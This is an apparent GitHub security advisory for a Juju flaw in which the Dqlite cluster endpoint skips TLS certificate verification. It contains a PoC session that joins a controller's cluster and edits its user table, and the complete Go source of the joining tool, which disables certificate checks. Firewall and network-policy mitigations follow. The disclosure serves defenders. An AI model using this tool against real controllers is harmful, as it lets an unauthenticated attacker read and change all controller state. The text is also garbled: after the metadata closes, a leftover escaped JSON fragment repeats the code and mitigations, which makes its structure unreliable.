GHSA-GVRJ-CJCH-728P

Vulnerability from github – Published: 2026-04-02 00:03 – Updated: 2026-04-08 11:57
Summary
Juju performs improper TLS client/server authentication and certificate verification on its database cluster
Details

Impact

Any Juju controller since version 3.2.0 is affected.

An attacker with nothing more than network reachability to the target Juju controller's Dqlite cluster endpoint may join the Dqlite cluster, then read and modify all controller state, including escalating privileges, opening firewall ports, and so on.

This is possible because the server does not verify the client's certificate. In addition, the client does not verify the server's certificate, which also makes man-in-the-middle (MITM) attacks possible.

https://github.com/juju/juju/blob/001318f51ac456602aef20b123684f1eeeae9a77/internal/database/node.go#L312-L324

PoC

Using the tool referenced below.

Bootstrap a controller and show the users:

$ juju bootstrap lxd a
Creating Juju controller "a" on lxd/localhost
Looking for packaged Juju agent version 4.0.4 for amd64
<...>
Launching controller instance(s) on localhost/localhost...
 - juju-fefd2b-0 (arch=amd64)
Installing Juju agent on bootstrap instance
Waiting for address
Attempting to connect to 10.151.236.15:22
<...>
Contacting Juju controller at 10.151.236.15 to verify accessibility...

Bootstrap complete, controller "a" is now available
Controller machines are in the "controller" model

Now you can run
    juju add-model <model-name>
to create a new model to deploy workloads.
$ juju users
Controller: a

Name               Display name  Access     Date created  Last connection
admin*             admin         superuser  1 minute ago  just now
juju-metrics       Juju Metrics  login      1 minute ago  never connected
everyone@external

Join the cluster with the first cluster member:

$ dqlite-demo --db 192.168.1.25:9999 --join 10.151.236.15:17666
dqlite interactive shell.
Enter SQL statements terminated with a semicolon.
Meta-commands: .switch <database>  .close  .exit

Connected to database "demo".
demo>

Join the cluster with another cluster member and give the admin a new name:

dqlite-demo --db 192.168.1.25:9998 --join 10.151.236.15:17666
dqlite interactive shell.
Enter SQL statements terminated with a semicolon.
Meta-commands: .switch <database>  .close  .exit

Connected to database "demo".
demo> .switch controller
Connected to database "controller".
controller> select * from user;
uuid                                 | name              | display_name | external | removed | created_by_uuid                      | created_at
-------------------------------------+-------------------+--------------+----------+---------+--------------------------------------+----------------------------------------
9d5c7126-1401-4ce6-8603-6a6b5ac90d23 | admin             | admin        | false    | false   | 9d5c7126-1401-4ce6-8603-6a6b5ac90d23 | 2026-03-17 06:38:25.816694339 +0000 UTC
4e1d65ae-564e-4c0e-8ef6-da8b7fb69b53 | juju-metrics      | Juju Metrics | false    | false   | 9d5c7126-1401-4ce6-8603-6a6b5ac90d23 | 2026-03-17 06:38:26.76549689 +0000 UTC
384c57af-57b1-40be-8e6e-7360371895d3 | everyone@external |              | true     | false   | 9d5c7126-1401-4ce6-8603-6a6b5ac90d23 | 2026-03-17 06:38:26.770215095 +0000 UTC
(3 row(s))
controller> update user set display_name='Silly Admin' where name='admin';
OK (1 row(s) affected)
controller>

The admin won't like this new name:

$ juju users
Controller: a

Name               Display name  Access     Date created   Last connection
admin*             Silly Admin   superuser  6 minutes ago  just now
juju-metrics       Juju Metrics  login      6 minutes ago  never connected
everyone@external

Patches

Juju versions 3.6.20 and 4.0.5 are patched to fix this issue.
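As a rough illustration (not an official Juju tool), assuming plain major.minor.patch version strings, an operator could check whether a given controller version is at or above the patched releases:

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// isPatched reports whether a Juju version string (e.g. "3.6.19") is at or
// above the patched releases: 3.6.20 for the 3.x series, 4.0.5 for 4.x.
// Hypothetical helper for illustration; it assumes simple x.y.z versions.
func isPatched(version string) bool {
	parts := strings.SplitN(version, ".", 3)
	if len(parts) != 3 {
		return false
	}
	nums := make([]int, 3)
	for i, p := range parts {
		n, err := strconv.Atoi(p)
		if err != nil {
			return false
		}
		nums[i] = n
	}
	// Compare minor.patch against the patched release for the series.
	atLeast := func(minor, patch int) bool {
		if nums[1] != minor {
			return nums[1] > minor
		}
		return nums[2] >= patch
	}
	switch nums[0] {
	case 3:
		return atLeast(6, 20)
	case 4:
		return atLeast(0, 5)
	default:
		return nums[0] > 4
	}
}

func main() {
	for _, v := range []string{"3.6.19", "3.6.20", "4.0.4", "4.0.5"} {
		fmt.Printf("%s patched: %v\n", v, isPatched(v))
	}
	// → 3.6.19 patched: false
	// → 3.6.20 patched: true
	// → 4.0.4 patched: false
	// → 4.0.5 patched: true
}
```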

Workarounds

The strongest protection is to apply the security updates; the following mitigations have also been explored. If the updates cannot be applied, use the steps below only as a last resort, and restore the original configuration once the updates are in place. Note that modified configuration files may prevent future unattended upgrades from completing successfully until they are reverted to their original content.

Option 1: Disable HA (High Availability). If your environment does not strictly require HA, reducing the cluster to a single controller removes the need for Dqlite replication. Even then, the Dqlite replication port (17666) should be blocked.

Option 2: Restrict which IPs can communicate with port 17666 by implementing firewall rules that block all other ingress traffic to this port. Only Juju controller IPs should be able to connect to it.

To restrict access to the Dqlite port to just the set of controller IPs, here is an example using ufw on a machine controller. The commands must be run on each controller, and the rules must be updated whenever the set of controller nodes changes. You will also need to allow access to the controller API port 17070 in accordance with your requirements for clients connecting to the Juju controllers.

# Restrict access to the Dqlite port.
sudo ufw allow from <controllerip1> to any port 17666 proto tcp
sudo ufw allow from <controllerip2> to any port 17666 proto tcp
sudo ufw allow from <controllerip3> to any port 17666 proto tcp
sudo ufw deny 17666/tcp
# Similarly, restrict the MongoDB port to controller access only.
sudo ufw allow from <controllerip1> to any port 37017 proto tcp
sudo ufw allow from <controllerip2> to any port 37017 proto tcp
sudo ufw allow from <controllerip3> to any port 37017 proto tcp
sudo ufw deny 37017/tcp
# Allow access to the controller API port.
sudo ufw allow from <your cidr goes here> to any port 17070 proto tcp
# Allow access to the controller SSH port.
sudo ufw allow from <your cidr goes here> to any port 22 proto tcp
# Ensure the firewall is enabled.
sudo ufw enable
# Check that the rules have been added correctly.
sudo ufw status

For Kubernetes controllers, HA is not supported. We recommend blocking access to port 17666. One way is to apply a network policy:

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: controller-0-17666-only-itself
  namespace: <your controller namespace goes here>
spec:
  podSelector:
    matchLabels:
      app.kubernetes.io/name: controller
      statefulset.kubernetes.io/pod-name: controller-0
  policyTypes:
    - Ingress
  ingress:
    - from:
        - podSelector:
            matchLabels:
              app.kubernetes.io/name: controller
              statefulset.kubernetes.io/pod-name: controller-0
      ports:
        - protocol: TCP
          port: 17666

References

https://github.com/juju/juju/blob/001318f51ac456602aef20b123684f1eeeae9a77/internal/database/node.go#L312-L324

PoC Tool

Based on the go-dqlite demo app.

package main

import (
    "context"
    "crypto/ecdsa"
    "crypto/elliptic"
    "crypto/rand"
    "crypto/tls"
    "crypto/x509"
    "crypto/x509/pkix"
    "database/sql"
    "encoding/pem"
    "fmt"
    "log"
    "math/big"
    "net"
    "os"
    "os/signal"
    "path/filepath"
    "strings"
    "time"

    "github.com/canonical/go-dqlite/v3/app"
    "github.com/canonical/go-dqlite/v3/client"
    "github.com/peterh/liner"
    "github.com/pkg/errors"
    "github.com/spf13/cobra"
    "golang.org/x/sys/unix"
)

// generateSelfSignedCert creates a throwaway self-signed ECDSA certificate
// and key. Any certificate works here: the vulnerable controller never
// verifies the peer's certificate.
func generateSelfSignedCert() (tls.Certificate, error) {
    key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
    if err != nil {
        return tls.Certificate{}, fmt.Errorf("generate key: %w", err)
    }

    tmpl := &x509.Certificate{
        SerialNumber: big.NewInt(1),
        Subject:      pkix.Name{CommonName: "lol"},
        NotBefore:    time.Now(),
        NotAfter:     time.Now().Add(365 * 24 * time.Hour),
        KeyUsage:     x509.KeyUsageKeyEncipherment | x509.KeyUsageDigitalSignature,
        ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
        IPAddresses:  []net.IP{net.ParseIP("127.0.0.1")},
        DNSNames:     []string{"lol"},
    }

    certDER, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
    if err != nil {
        return tls.Certificate{}, fmt.Errorf("create cert: %w", err)
    }

    keyDER, err := x509.MarshalECPrivateKey(key)
    if err != nil {
        return tls.Certificate{}, fmt.Errorf("marshal key: %w", err)
    }

    certPEM := pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: certDER})
    keyPEM := pem.EncodeToMemory(&pem.Block{Type: "EC PRIVATE KEY", Bytes: keyDER})

    return tls.X509KeyPair(certPEM, keyPEM)
}

// runREPL runs an interactive SQL REPL against the given dqlite app.
// It supports multi-line statements (terminated by ';') and the meta-commands
// .switch <database>, .close, and .exit.
func runREPL(ctx context.Context, dqliteApp *app.App, initialDBName string, line *liner.State) error {
    var currentDB *sql.DB
    var currentDBName string

    openDB := func(name string) error {
        if currentDB != nil {
            if err := currentDB.Close(); err != nil {
                fmt.Fprintf(os.Stderr, "Warning: closing previous database: %v\n", err)
            }
            currentDB = nil
            currentDBName = ""
        }
        db, err := dqliteApp.Open(ctx, name)
        if err != nil {
            return fmt.Errorf("open database %q: %w", name, err)
        }
        currentDB = db
        currentDBName = name
        fmt.Printf("Connected to database %q.\n", name)
        return nil
    }

    defer func() {
        if currentDB != nil {
            currentDB.Close()
        }
    }()

    fmt.Println("dqlite interactive shell.")
    fmt.Println("Enter SQL statements terminated with a semicolon.")
    fmt.Println("Meta-commands: .switch <database>  .close  .exit")
    fmt.Println()

    if initialDBName != "" {
        if err := openDB(initialDBName); err != nil {
            return err
        }
    } else {
        fmt.Println("No database selected. Use .switch <database> to open one.")
    }

    prompt := func(multiline bool) string {
        if multiline {
            return "   ...> "
        }
        if currentDBName != "" {
            return currentDBName + "> "
        }
        return "(no db)> "
    }

    var buf strings.Builder

    for {
        input, err := line.Prompt(prompt(buf.Len() > 0))
        if err != nil {
            if err == liner.ErrPromptAborted {
                if buf.Len() > 0 {
                    buf.Reset()
                    fmt.Println("(statement aborted)")
                }
                continue
            }
            // EOF (Ctrl-D) or liner closed externally — exit cleanly.
            fmt.Println()
            break
        }

        if input != "" {
            line.AppendHistory(input)
        }

        trimmed := strings.TrimSpace(input)
        if trimmed == "" {
            continue
        }

        // Meta-commands are only recognised at the start of a fresh statement.
        if buf.Len() == 0 && strings.HasPrefix(trimmed, ".") {
            parts := strings.Fields(trimmed)
            switch parts[0] {
            case ".exit":
                return nil

            case ".close":
                if currentDB != nil {
                    if err := currentDB.Close(); err != nil {
                        fmt.Fprintf(os.Stderr, "Error closing database: %v\n", err)
                    } else {
                        fmt.Printf("Database %q closed.\n", currentDBName)
                    }
                    currentDB = nil
                    currentDBName = ""
                } else {
                    fmt.Println("No database is currently open.")
                }

            case ".switch":
                if len(parts) < 2 {
                    fmt.Fprintln(os.Stderr, "Usage: .switch <database>")
                } else {
                    if err := openDB(parts[1]); err != nil {
                        fmt.Fprintf(os.Stderr, "Error: %v\n", err)
                    }
                }

            default:
                fmt.Fprintf(os.Stderr, "Unknown meta-command: %s\n", parts[0])
                fmt.Fprintln(os.Stderr, "Available meta-commands: .switch <database>  .close  .exit")
            }
            continue
        }

        // Accumulate SQL across lines.
        if buf.Len() > 0 {
            buf.WriteByte('\n')
        }
        buf.WriteString(input)

        // Execute once the statement is terminated with a semicolon.
        stmt := strings.TrimSpace(buf.String())
        if strings.HasSuffix(stmt, ";") {
            buf.Reset()
            if currentDB == nil {
                fmt.Fprintln(os.Stderr, "Error: no database open. Use .switch <database> to open one.")
                continue
            }
            if err := execSQL(currentDB, stmt); err != nil {
                fmt.Fprintf(os.Stderr, "Error: %v\n", err)
            }
        }
    }

    return nil
}

// execSQL dispatches to execQuery or execStatement based on the leading keyword.
func execSQL(db *sql.DB, stmt string) error {
    // Trim the trailing semicolon just for the prefix check.
    upper := strings.ToUpper(strings.TrimSpace(strings.TrimSuffix(strings.TrimSpace(stmt), ";")))
    switch {
    case strings.HasPrefix(upper, "SELECT"),
        strings.HasPrefix(upper, "WITH"),
        strings.HasPrefix(upper, "PRAGMA"),
        strings.HasPrefix(upper, "EXPLAIN"):
        return execQuery(db, stmt)
    default:
        return execStatement(db, stmt)
    }
}

// execQuery runs a statement expected to return rows and prints them as a table.
func execQuery(db *sql.DB, stmt string) error {
    rows, err := db.Query(stmt)
    if err != nil {
        return err
    }
    defer rows.Close()

    cols, err := rows.Columns()
    if err != nil {
        return err
    }
    if len(cols) == 0 {
        fmt.Println("OK")
        return nil
    }

    // Initialise column widths from the header names.
    widths := make([]int, len(cols))
    for i, c := range cols {
        widths[i] = len(c)
    }

    // Scan all rows into memory so we can compute column widths before printing.
    vals := make([]interface{}, len(cols))
    valPtrs := make([]interface{}, len(cols))
    for i := range vals {
        valPtrs[i] = &vals[i]
    }

    var allRows [][]string
    for rows.Next() {
        if err := rows.Scan(valPtrs...); err != nil {
            return err
        }
        row := make([]string, len(cols))
        for i, v := range vals {
            if v == nil {
                row[i] = "NULL"
            } else {
                row[i] = fmt.Sprintf("%v", v)
            }
            if len(row[i]) > widths[i] {
                widths[i] = len(row[i])
            }
        }
        allRows = append(allRows, row)
    }
    if err := rows.Err(); err != nil {
        return err
    }

    printRow(cols, widths)
    printSeparator(widths)
    for _, row := range allRows {
        printRow(row, widths)
    }
    fmt.Printf("(%d row(s))\n", len(allRows))
    return nil
}

// execStatement runs a non-SELECT statement and prints the rows-affected count.
func execStatement(db *sql.DB, stmt string) error {
    result, err := db.Exec(stmt)
    if err != nil {
        return err
    }
    affected, err := result.RowsAffected()
    if err != nil {
        fmt.Println("OK")
        return nil
    }
    fmt.Printf("OK (%d row(s) affected)\n", affected)
    return nil
}

func printRow(vals []string, widths []int) {
    parts := make([]string, len(vals))
    for i, v := range vals {
        parts[i] = fmt.Sprintf("%-*s", widths[i], v)
    }
    fmt.Println(strings.Join(parts, " | "))
}

func printSeparator(widths []int) {
    parts := make([]string, len(widths))
    for i, w := range widths {
        parts[i] = strings.Repeat("-", w)
    }
    fmt.Println(strings.Join(parts, "-+-"))
}

func main() {
    var db string
    var join *[]string
    var dir string
    var verbose bool
    var dbName string

    cmd := &cobra.Command{
        Use:   "dqlite-demo",
        Short: "Interactive dqlite SQL REPL",
        Long: `An interactive SQL REPL backed by a dqlite cluster node.

Type SQL statements terminated with a semicolon (;) to execute them.
Statements can span multiple lines.

Meta-commands:
  .switch <database>   Open (or switch to) a named database
  .close               Close the current database connection
  .exit                Exit the REPL

Complete documentation is available at https://github.com/canonical/go-dqlite`,
        RunE: func(cmd *cobra.Command, args []string) error {
            nodeDir := filepath.Join(dir, db)
            if err := os.MkdirAll(nodeDir, 0755); err != nil {
                return errors.Wrapf(err, "can't create %s", nodeDir)
            }

            logFunc := func(l client.LogLevel, format string, a ...interface{}) {
                if !verbose {
                    return
                }
                log.Printf(fmt.Sprintf("%s: %s: %s\n", db, l.String(), format), a...)
            }

            cert, err := generateSelfSignedCert()
            if err != nil {
                return err
            }
            options := []app.Option{
                app.WithAddress(db),
                app.WithCluster(*join),
                app.WithLogFunc(logFunc),
                // Present a throwaway self-signed certificate and disable all
                // verification; the vulnerable controller accepts it anyway.
                app.WithTLS(&tls.Config{
                    InsecureSkipVerify: true,
                    ClientCAs:          x509.NewCertPool(),
                    Certificates:       []tls.Certificate{cert},
                }, &tls.Config{
                    InsecureSkipVerify: true,
                }),
            }

            dqliteApp, err := app.New(nodeDir, options...)
            if err != nil {
                return err
            }
            defer func() {
                dqliteApp.Handover(context.Background())
                dqliteApp.Close()
            }()

            if err := dqliteApp.Ready(context.Background()); err != nil {
                return err
            }

            line := liner.NewLiner()
            line.SetCtrlCAborts(true)
            defer line.Close()

            // Forward termination signals by closing the liner, which causes
            // Prompt() to return and the REPL loop to exit cleanly.
            sigCh := make(chan os.Signal, 32)
            signal.Notify(sigCh, unix.SIGPWR, unix.SIGQUIT, unix.SIGTERM)
            go func() {
                <-sigCh
                line.Close()
            }()

            return runREPL(context.Background(), dqliteApp, dbName, line)
        },
    }

    flags := cmd.Flags()
    flags.StringVarP(&db, "db", "d", "", "address used for internal database replication")
    join = flags.StringSliceP("join", "j", nil, "database addresses of existing nodes")
    flags.StringVarP(&dir, "dir", "D", "/tmp/dqlite-demo", "data directory")
    flags.BoolVarP(&verbose, "verbose", "v", false, "verbose logging")
    flags.StringVarP(&dbName, "name", "n", "controller", "initial database name to open on startup")

    cmd.MarkFlagRequired("db")

    if err := cmd.Execute(); err != nil {
        os.Exit(1)
    }
}

OSV record metadata:

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/juju/juju"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.0.0-20260401092550-1c1ac1922b57"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-4370"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-295",
      "CWE-296"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-02T00:03:36Z",
    "nvd_published_at": "2026-04-01T09:16:17Z",
    "severity": "CRITICAL"
  }
}
err := openDB(parts[1]); err != nil {\n\t\t\t\t\t\tfmt.Fprintf(os.Stderr, \"Error: %v\\n\", err)\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\tdefault:\n\t\t\t\tfmt.Fprintf(os.Stderr, \"Unknown meta-command: %s\\n\", parts[0])\n\t\t\t\tfmt.Fprintln(os.Stderr, \"Available meta-commands: .switch \u003cdatabase\u003e  .close  .exit\")\n\t\t\t}\n\t\t\tcontinue\n\t\t}\n\n\t\t// Accumulate SQL across lines.\n\t\tif buf.Len() \u003e 0 {\n\t\t\tbuf.WriteByte(\u0027\\n\u0027)\n\t\t}\n\t\tbuf.WriteString(input)\n\n\t\t// Execute once the statement is terminated with a semicolon.\n\t\tstmt := strings.TrimSpace(buf.String())\n\t\tif strings.HasSuffix(stmt, \";\") {\n\t\t\tbuf.Reset()\n\t\t\tif currentDB == nil {\n\t\t\t\tfmt.Fprintln(os.Stderr, \"Error: no database open. Use .switch \u003cdatabase\u003e to open one.\")\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif err := execSQL(currentDB, stmt); err != nil {\n\t\t\t\tfmt.Fprintf(os.Stderr, \"Error: %v\\n\", err)\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}\n\n// execSQL dispatches to execQuery or execStatement based on the leading keyword.\nfunc execSQL(db *sql.DB, stmt string) error {\n\t// Trim the trailing semicolon just for the prefix check.\n\tupper := strings.ToUpper(strings.TrimSpace(strings.TrimSuffix(strings.TrimSpace(stmt), \";\")))\n\tswitch {\n\tcase strings.HasPrefix(upper, \"SELECT\"),\n\t\tstrings.HasPrefix(upper, \"WITH\"),\n\t\tstrings.HasPrefix(upper, \"PRAGMA\"),\n\t\tstrings.HasPrefix(upper, \"EXPLAIN\"):\n\t\treturn execQuery(db, stmt)\n\tdefault:\n\t\treturn execStatement(db, stmt)\n\t}\n}\n\n// execQuery runs a statement expected to return rows and prints them as a table.\nfunc execQuery(db *sql.DB, stmt string) error {\n\trows, err := db.Query(stmt)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer rows.Close()\n\n\tcols, err := rows.Columns()\n\tif err != nil {\n\t\treturn err\n\t}\n\tif len(cols) == 0 {\n\t\tfmt.Println(\"OK\")\n\t\treturn nil\n\t}\n\n\t// Initialise column widths from the header names.\n\twidths := make([]int, 
len(cols))\n\tfor i, c := range cols {\n\t\twidths[i] = len(c)\n\t}\n\n\t// Scan all rows into memory so we can compute column widths before printing.\n\tvals := make([]interface{}, len(cols))\n\tvalPtrs := make([]interface{}, len(cols))\n\tfor i := range vals {\n\t\tvalPtrs[i] = \u0026vals[i]\n\t}\n\n\tvar allRows [][]string\n\tfor rows.Next() {\n\t\tif err := rows.Scan(valPtrs...); err != nil {\n\t\t\treturn err\n\t\t}\n\t\trow := make([]string, len(cols))\n\t\tfor i, v := range vals {\n\t\t\tif v == nil {\n\t\t\t\trow[i] = \"NULL\"\n\t\t\t} else {\n\t\t\t\trow[i] = fmt.Sprintf(\"%v\", v)\n\t\t\t}\n\t\t\tif len(row[i]) \u003e widths[i] {\n\t\t\t\twidths[i] = len(row[i])\n\t\t\t}\n\t\t}\n\t\tallRows = append(allRows, row)\n\t}\n\tif err := rows.Err(); err != nil {\n\t\treturn err\n\t}\n\n\tprintRow(cols, widths)\n\tprintSeparator(widths)\n\tfor _, row := range allRows {\n\t\tprintRow(row, widths)\n\t}\n\tfmt.Printf(\"(%d row(s))\\n\", len(allRows))\n\treturn nil\n}\n\n// execStatement runs a non-SELECT statement and prints the rows-affected count.\nfunc execStatement(db *sql.DB, stmt string) error {\n\tresult, err := db.Exec(stmt)\n\tif err != nil {\n\t\treturn err\n\t}\n\taffected, err := result.RowsAffected()\n\tif err != nil {\n\t\tfmt.Println(\"OK\")\n\t\treturn nil\n\t}\n\tfmt.Printf(\"OK (%d row(s) affected)\\n\", affected)\n\treturn nil\n}\n\nfunc printRow(vals []string, widths []int) {\n\tparts := make([]string, len(vals))\n\tfor i, v := range vals {\n\t\tparts[i] = fmt.Sprintf(\"%-*s\", widths[i], v)\n\t}\n\tfmt.Println(strings.Join(parts, \" | \"))\n}\n\nfunc printSeparator(widths []int) {\n\tparts := make([]string, len(widths))\n\tfor i, w := range widths {\n\t\tparts[i] = strings.Repeat(\"-\", w)\n\t}\n\tfmt.Println(strings.Join(parts, \"-+-\"))\n}\n\nfunc main() {\n\tvar db string\n\tvar join *[]string\n\tvar dir string\n\tvar verbose bool\n\tvar dbName string\n\n\tcmd := \u0026cobra.Command{\n\t\tUse:   \"dqlite-demo\",\n\t\tShort: \"Interactive 
dqlite SQL REPL\",\n\t\tLong: `An interactive SQL REPL backed by a dqlite cluster node.\n\nType SQL statements terminated with a semicolon (;) to execute them.\nStatements can span multiple lines.\n\nMeta-commands:\n  .switch \u003cdatabase\u003e   Open (or switch to) a named database\n  .close               Close the current database connection\n  .exit                Exit the REPL\n\nComplete documentation is available at https://github.com/canonical/go-dqlite`,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tnodeDir := filepath.Join(dir, db)\n\t\t\tif err := os.MkdirAll(nodeDir, 0755); err != nil {\n\t\t\t\treturn errors.Wrapf(err, \"can\u0027t create %s\", nodeDir)\n\t\t\t}\n\n\t\t\tlogFunc := func(l client.LogLevel, format string, a ...interface{}) {\n\t\t\t\tif !verbose {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tlog.Printf(fmt.Sprintf(\"%s: %s: %s\\n\", db, l.String(), format), a...)\n\t\t\t}\n\n\t\t\tcart, err := generateSelfSignedCert()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\toptions := []app.Option{\n\t\t\t\tapp.WithAddress(db),\n\t\t\t\tapp.WithCluster(*join),\n\t\t\t\tapp.WithLogFunc(logFunc),\n\t\t\t\tapp.WithTLS(\u0026tls.Config{\n\t\t\t\t\tInsecureSkipVerify: true,\n\t\t\t\t\tClientCAs:          x509.NewCertPool(),\n\t\t\t\t\tCertificates:       []tls.Certificate{cart},\n\t\t\t\t}, \u0026tls.Config{\n\t\t\t\t\tInsecureSkipVerify: true,\n\t\t\t\t}),\n\t\t\t}\n\n\t\t\tdqliteApp, err := app.New(nodeDir, options...)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer func() {\n\t\t\t\tdqliteApp.Handover(context.Background())\n\t\t\t\tdqliteApp.Close()\n\t\t\t}()\n\n\t\t\tif err := dqliteApp.Ready(context.Background()); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tline := liner.NewLiner()\n\t\t\tline.SetCtrlCAborts(true)\n\t\t\tdefer line.Close()\n\n\t\t\t// Forward termination signals by closing the liner, which causes\n\t\t\t// Prompt() to return and the REPL loop to exit cleanly.\n\t\t\tsigCh := 
make(chan os.Signal, 32)\n\t\t\tsignal.Notify(sigCh, unix.SIGPWR, unix.SIGQUIT, unix.SIGTERM)\n\t\t\tgo func() {\n\t\t\t\t\u003c-sigCh\n\t\t\t\tline.Close()\n\t\t\t}()\n\n\t\t\treturn runREPL(context.Background(), dqliteApp, dbName, line)\n\t\t},\n\t}\n\n\tflags := cmd.Flags()\n\tflags.StringVarP(\u0026db, \"db\", \"d\", \"\", \"address used for internal database replication\")\n\tjoin = flags.StringSliceP(\"join\", \"j\", nil, \"database addresses of existing nodes\")\n\tflags.StringVarP(\u0026dir, \"dir\", \"D\", \"/tmp/dqlite-demo\", \"data directory\")\n\tflags.BoolVarP(\u0026verbose, \"verbose\", \"v\", false, \"verbose logging\")\n\tflags.StringVarP(\u0026dbName, \"name\", \"n\", \"controller\", \"initial database name to open on startup\")\n\n\tcmd.MarkFlagRequired(\"db\")\n\n\tif err := cmd.Execute(); err != nil {\n\t\tos.Exit(1)\n\t}\n}\n```\n## Mitigation\n\nThe strongest protection is to apply the security updates. The following mitigations have also been explored. If security updates cannot be applied, you should only apply the following steps as a last resort, and restore the original configuration once updates are applied. Please note that modifying configuration files may stop future unattended upgrades from completing successfully until these are reverted to their original content.\n\nOption 1: Disable the HA (High Availability) controller. If your environment does not strictly require HA, reducing the cluster to a single controller removes the need for Dqlite replication. In addition, the Dqlite replication port, 17666, should be blocked.\nOption 2: Restrict which IPs can communicate with port 17666 by implementing firewall rules that block all other ingress traffic to this port. Only Juju controller IPs should be able to connect to it.\n\nTo restrict access to the Dqlite port to just the set of controller IPs, here\u0027s an example using ufw for a machine controller. This needs to be run on each controller. 
If the controller nodes change configuration, the rules will need to be updated accordingly.\nYou will also need to enable access to the controller API port 17070 in accordance with your requirements for allowing clients to connect to the Juju controllers.\n\n```\n# Restrict access to the Dqlite port.\nsudo ufw allow from \u003ccontrollerip1\u003e to any port 17666 proto tcp\nsudo ufw allow from \u003ccontrollerip2\u003e to any port 17666 proto tcp\nsudo ufw allow from \u003ccontrollerip3\u003e to any port 17666 proto tcp\nsudo ufw deny 17666/tcp\n# Similarly, the MongoDB port needs to allow controller access.\nsudo ufw allow from \u003ccontrollerip1\u003e to any port 37017 proto tcp\nsudo ufw allow from \u003ccontrollerip2\u003e to any port 37017 proto tcp\nsudo ufw allow from \u003ccontrollerip3\u003e to any port 37017 proto tcp\nsudo ufw deny 37017/tcp\n# Allow access to the controller API port.\nsudo ufw allow from \u003cyour cidr goes here\u003e to any port 17070 proto tcp\n# Allow access to the controller SSH port.\nsudo ufw allow from \u003cyour cidr goes here\u003e to any port 22 proto tcp\n# Ensure the firewall is enabled.\nsudo ufw enable\n# Check that the rules have been added correctly.\nsudo ufw status\n```\n\nFor Kubernetes controllers, HA is not supported. We recommend blocking access to port 17666. One way is to apply a network policy:\n\n```\napiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n  name: controller-0-17666-only-itself\n  namespace: \u003cyour controller namespace goes here\u003e\nspec:\n  podSelector:\n    matchLabels:\n      app: controller\n      statefulset.kubernetes.io/pod-name: controller-0\n  policyTypes:\n    - Ingress\n  ingress:\n    - from:\n        - podSelector:\n            matchLabels:\n              app: controller\n              statefulset.kubernetes.io/pod-name: controller-0\n      ports:\n        - protocol: TCP\n          port: 17666\n```",
  "id": "GHSA-gvrj-cjch-728p",
  "modified": "2026-04-08T11:57:35Z",
  "published": "2026-04-02T00:03:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/juju/juju/security/advisories/GHSA-gvrj-cjch-728p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4370"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/juju/juju"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Juju has Improper TLS Client/Server authentication and certificate verification on Database Cluster"
}

